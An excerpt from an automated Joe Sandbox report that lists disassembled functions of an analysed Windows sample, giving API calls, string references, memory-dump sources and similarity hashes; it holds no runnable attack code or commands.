CoUninitialize.OLE32 ref: 00128AF8
CoCreateInstance.OLE32(?,00000000,00000017,00143BBC,?), ref: 00128B58
IIDFromString.OLE32(?,?), ref: 00128BCB
#8.OLEAUT32(?), ref: 00128C65
#9.WSOCK32(?,?), ref: 00128CC6

Strings

Invalid parameter, xrefs: 00128BE4
Failed to create object, xrefs: 00128B63, 00128C19
NULL Pointer assignment, xrefs: 00128B9D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CreateFromInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 1994486276-1287834457
Opcode ID: e3b3b66c99c2f5e62a07b65af3fe34bf28a3daf8e35eb50327155d921b61e96e
Instruction ID: ae78237b814db2a89bddf278c4ca017a7a213534d545a29b92c6f6579647a106
Opcode Fuzzy Hash: e3b3b66c99c2f5e62a07b65af3fe34bf28a3daf8e35eb50327155d921b61e96e
Instruction Fuzzy Hash: 0961B07060A7219FC714DF14E889FAAB7E8EF49714F00085DF9859B291DB70ED94CBA2

Function 00125E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163fileCOMMON

Download Yara Rule

APIs

#115.WSOCK32(00000101,?), ref: 00125E7E
#10.WSOCK32(?,?,?), ref: 00125EC3
#52.WSOCK32(?), ref: 00125ECF
IcmpCreateFile.IPHLPAPI ref: 00125EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00125F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00125F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00125FD8
#116.WSOCK32 ref: 00125FDE

Strings

Ping, xrefs: 00125F01

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Icmp$EchoSend$#115#116CloseCreateFileHandle
String ID: Ping
API String ID: 1853569507-2246546115
Opcode ID: 9a368e8d14ccbf92992d0e8ca01be6b271853336b36fa21744d209987c5c5bc0
Instruction ID: 2ae96ca462434e41b79f4a3507258ae72e5abbc7fa775f3705f91d817c97b7ca
Opcode Fuzzy Hash: 9a368e8d14ccbf92992d0e8ca01be6b271853336b36fa21744d209987c5c5bc0
Instruction Fuzzy Hash: EF51CC316046109FD721EF24ED89B6AB7E1EF48720F144929FA95DB2E2DB70ED50CB42

Function 000C4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 000C4E22
KillTimer.USER32(?,00000001), ref: 000C4E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C4E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C4E7A
CreatePopupMenu.USER32 ref: 000C4E8E
PostQuitMessage.USER32(00000000), ref: 000C4EAF

Strings

TaskbarCreated, xrefs: 000C4E75

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: db61d2a247d522510c27a2a89b5fab0d8f93895f3e9a4d5fdc13a88f64655371
Instruction ID: 5af3a1bdc15f9970c66786219d97376190357a29c83df42f5beb7b9dfd1219f9
Opcode Fuzzy Hash: db61d2a247d522510c27a2a89b5fab0d8f93895f3e9a4d5fdc13a88f64655371
Instruction Fuzzy Hash: C3413A3124860AABDB266F24DC1DFFE36A5F755301F02012DFA46925E3CBB0ACD09762

Function 0011BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0011BB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0011BB89
GetLastError.KERNEL32 ref: 0011BB93
SetErrorMode.KERNEL32(00000000,READY), ref: 0011BC00

Strings

INVALID, xrefs: 0011BBD2
UNKNOWN, xrefs: 0011BBB8
READY, xrefs: 0011BBD9
READONLY, xrefs: 0011BBCB
NOTREADY, xrefs: 0011BBBF

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 4748c39502092008426a306b1b4328402a4c144bc3786a09e29650a0619af291
Instruction ID: 0095e3a39289d177948d6320cea50951e77a8aaacc50e2d4d906b018c2f40118
Opcode Fuzzy Hash: 4748c39502092008426a306b1b4328402a4c144bc3786a09e29650a0619af291
Instruction Fuzzy Hash: 1A31C035A08209AFCB18DF64C8C5EEDB7B8EF49300F108029E905D76D6DB709A81CB55

Function 00109B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00109BCC
GetDlgCtrlID.USER32 ref: 00109BD7
GetParent.USER32 ref: 00109BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00109BF6
GetDlgCtrlID.USER32(?), ref: 00109BFF
GetParent.USER32(?), ref: 00109C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00109C1E

Strings

ComboBox, xrefs: 00109B54
ListBox, xrefs: 00109B89

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 5b5624949ef6f2b650d2620ce8b9decd189cdbc33c6a5cd6b5d858728a3061fe
Instruction ID: 5ddb1e0704ebc8b4d27e459b25806010986432eccad3aba755c02467a8ca7d42
Opcode Fuzzy Hash: 5b5624949ef6f2b650d2620ce8b9decd189cdbc33c6a5cd6b5d858728a3061fe
Instruction Fuzzy Hash: D921F1B5901104AFDF04EB61CC95EFEBBB4EF9A310F000155F9A2932E2DBB489259A20

Function 00109C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00109CB5
GetDlgCtrlID.USER32 ref: 00109CC0
GetParent.USER32 ref: 00109CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00109CDF
GetDlgCtrlID.USER32(?), ref: 00109CE8
GetParent.USER32(?), ref: 00109D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00109D07

Strings

ComboBox, xrefs: 00109C3F
ListBox, xrefs: 00109C74

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: e30b4bf2f33c917ab6c5a7e3a7d0ced5a5137ea6ddbb150516f3afbe184098a4
Instruction ID: f749797663f58f4050e164fccc5fd5edd8d900fac6bf939814e56e7d35a98781
Opcode Fuzzy Hash: e30b4bf2f33c917ab6c5a7e3a7d0ced5a5137ea6ddbb150516f3afbe184098a4
Instruction Fuzzy Hash: 2121D3B5D41104BBDF05EBA1CC95EFEBBB9EF95300F100015F992931E2DB7589659B20

Function 00109D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00109D27
GetClassNameW.USER32(00000000,?,00000100), ref: 00109D3C
_wcscmp.LIBCMT ref: 00109D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00109DC9

Strings

SHELLDLL_DefView, xrefs: 00109D48
largeicons, xrefs: 00109D5D
details, xrefs: 00109D77
list, xrefs: 00109DAB
smallicons, xrefs: 00109D91

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 311af0fd7b56d027c643dadf11ebd7f45b7f75e0ddf7abae0cbaf5f5b186a28a
Instruction ID: 0f627d8150f6a15a80a96536d88f1cba71328930803e1ae7ea5e3a4d483c99e1
Opcode Fuzzy Hash: 311af0fd7b56d027c643dadf11ebd7f45b7f75e0ddf7abae0cbaf5f5b186a28a
Instruction Fuzzy Hash: FC1106BA289317BAF6056660EC27DE7739CDF05360B200017FA41A40E3FBE56A615A66

Function 00128F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

#8.OLEAUT32(?), ref: 00128FC1
CoInitialize.OLE32(00000000), ref: 00128FEE
CoUninitialize.OLE32 ref: 00128FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 001290F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00129225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00143BDC), ref: 00129259
CoGetObject.OLE32(?,00000000,00143BDC,?), ref: 0012927C
SetErrorMode.KERNEL32(00000000), ref: 0012928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0012930F
#9.WSOCK32(?), ref: 0012931F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ErrorMode$Object$FileFromInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 3414436084-0
Opcode ID: ca3acc65149295eebf6a0a6bc6009b49949ec48cb880b88c5c3899ceb5629a6f
Instruction ID: 346cf44d9926caec516ac479239d9f622098119f9ae979601e7b604dc4e9b985
Opcode Fuzzy Hash: ca3acc65149295eebf6a0a6bc6009b49949ec48cb880b88c5c3899ceb5629a6f
Instruction Fuzzy Hash: B9C146B1608315AFC700DF69D88496BB7E9FF89308F00495DF98A9B261DB71ED05CB92

Function 0011443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00114451
__swprintf.LIBCMT ref: 0011445E

Part of subcall function 000D38C8: __woutput_l.LIBCMT ref: 000D3921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00114488
LoadResource.KERNEL32(?,00000000), ref: 00114494
LockResource.KERNEL32(00000000), ref: 001144A1
FindResourceW.KERNEL32(?,?,00000003), ref: 001144C1
LoadResource.KERNEL32(?,00000000), ref: 001144D3
SizeofResource.KERNEL32(?,00000000), ref: 001144E2
LockResource.KERNEL32(?), ref: 001144EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 0011454F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 144fe6b38a3cfbc817aa208733ff2225cc43dd37859f612fd67ce9ce5663d6ff
Instruction ID: 9550ebb3b75f9e1c2c164cdae4f2d476757737e14e987bcd5d41bf719647af2f
Opcode Fuzzy Hash: 144fe6b38a3cfbc817aa208733ff2225cc43dd37859f612fd67ce9ce5663d6ff
Instruction Fuzzy Hash: 6F31CF7550121AABCB159FB1EC48EFB7BB9EF09701F004425FA06D6551DB70DAA1CBB0

Function 001119CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001119EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111A03
GetWindowThreadProcessId.USER32(00000000), ref: 00111A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00110A67,?,00000001), ref: 00111A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00111A2B
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00110A67,?,00000001), ref: 00111A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00110A67,?,00000001), ref: 00111A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111A9B
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111AB0
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111ABB

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: f08ad775ba27f9d07538a73119db02bc4be0fcd3a3f04183f4aeef585e8cd035
Instruction ID: 3100e4507a3397d79a5f6fd2e1d1305611a1cb7bc0467e982b7d06878d5c937d
Opcode Fuzzy Hash: f08ad775ba27f9d07538a73119db02bc4be0fcd3a3f04183f4aeef585e8cd035
Instruction Fuzzy Hash: 1A310E35241244BFEB199F10EC48BA9BBBAFF59305F114525FA09C35A0CBB09DC08B60

Function 000EC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 000B260D
SetTextColor.GDI32(?,000000FF), ref: 000B2617
SetBkMode.GDI32(?,00000001), ref: 000B262C
GetStockObject.GDI32(00000005), ref: 000B2634
GetClientRect.USER32(?), ref: 000EC0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 000EC113
GetWindowDC.USER32(?), ref: 000EC11F
GetPixel.GDI32(00000000,?,?), ref: 000EC12E
ReleaseDC.USER32(?,00000000), ref: 000EC140
GetSysColor.USER32(00000005), ref: 000EC15E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: cda9dd9e67d202e6397f13c0a8426ba500bf3c31984690c78a60aefbcb386bde
Instruction ID: 52f5c40556597450d19349b4cb6df3bf9704372600000bd6ecd60e15e66260cc
Opcode Fuzzy Hash: cda9dd9e67d202e6397f13c0a8426ba500bf3c31984690c78a60aefbcb386bde
Instruction Fuzzy Hash: 17117C35500244BFEB625FA5EC08BE97BB1EB0A721F104265FB6A954F1CB324991EF10

Function 000BAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000BADE1
OleUninitialize.OLE32(?,00000000), ref: 000BAE80
UnregisterHotKey.USER32(?), ref: 000BAFD7
DestroyWindow.USER32(?), ref: 000F2F64
FreeLibrary.KERNEL32(?), ref: 000F2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F2FF6

Strings

close all, xrefs: 000BADDC

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: a73203a743ec0036c645400b22ca0e857159d76a1982273bc9d152447bf1583a
Instruction ID: 94de4673404eb990f94933da7d2f4e6389f6df722417f3c10d2e9bfe8c3bbab2
Opcode Fuzzy Hash: a73203a743ec0036c645400b22ca0e857159d76a1982273bc9d152447bf1583a
Instruction Fuzzy Hash: 9AA17A307012128FCB69EF50C4A5BBDF7A4AF05710F5042ADE90AAB662CB31ED56CF91

Function 0010AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0010B13A), ref: 0010B078

Strings

REGEXPCLASS, xrefs: 0010AE3D
NAME, xrefs: 0010AEAA
CLASS, xrefs: 0010ADF7
CLASSNN, xrefs: 0010AE1A
INSTANCE, xrefs: 0010AF86
TEXT, xrefs: 0010AFAF

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 626624539c304e5520aa624a0b5bbfae4c92479323f148a063b3a21073b52b18
Instruction ID: 4ec4a938d52f93c5928e95fa3eee9088f37e23350c6abf116a176feb59cbae4e
Opcode Fuzzy Hash: 626624539c304e5520aa624a0b5bbfae4c92479323f148a063b3a21073b52b18
Instruction Fuzzy Hash: B891A870504706DADB18EF60C481BEEFB75FF14300F94811AE99AA72D2DF706959CBA1

Function 000B31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 000B327E

Part of subcall function 000B218F: GetClientRect.USER32(?,?), ref: 000B21B8
Part of subcall function 000B218F: GetWindowRect.USER32(?,?), ref: 000B21F9
Part of subcall function 000B218F: ScreenToClient.USER32(?,?), ref: 000B2221

GetDC.USER32 ref: 000ED073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000ED086
SelectObject.GDI32(00000000,00000000), ref: 000ED094
SelectObject.GDI32(00000000,00000000), ref: 000ED0A9
ReleaseDC.USER32(?,00000000), ref: 000ED0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000ED13C

Strings

U, xrefs: 000ED011

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 76a3565eac45a75a2409e05c4f9ce11dfa63cb0659e1e03eb4267354646381f6
Instruction ID: bee7b10c12d142bf017ce766154ef9a0059ecae482903ecb33fba8adf863b96e
Opcode Fuzzy Hash: 76a3565eac45a75a2409e05c4f9ce11dfa63cb0659e1e03eb4267354646381f6
Instruction Fuzzy Hash: 1C71D330504245EFCF61CF65C884AEE7BF5FF49360F2842AAED556A2A6C7318D81DB60

Function 001220E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0012211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00122148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0012218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0012219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001221AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001221DC
InternetCloseHandle.WININET(00000000), ref: 00122223

Part of subcall function 00122B4F: GetLastError.KERNEL32(?,?,00121EE3,00000000,00000000,00000001), ref: 00122B64
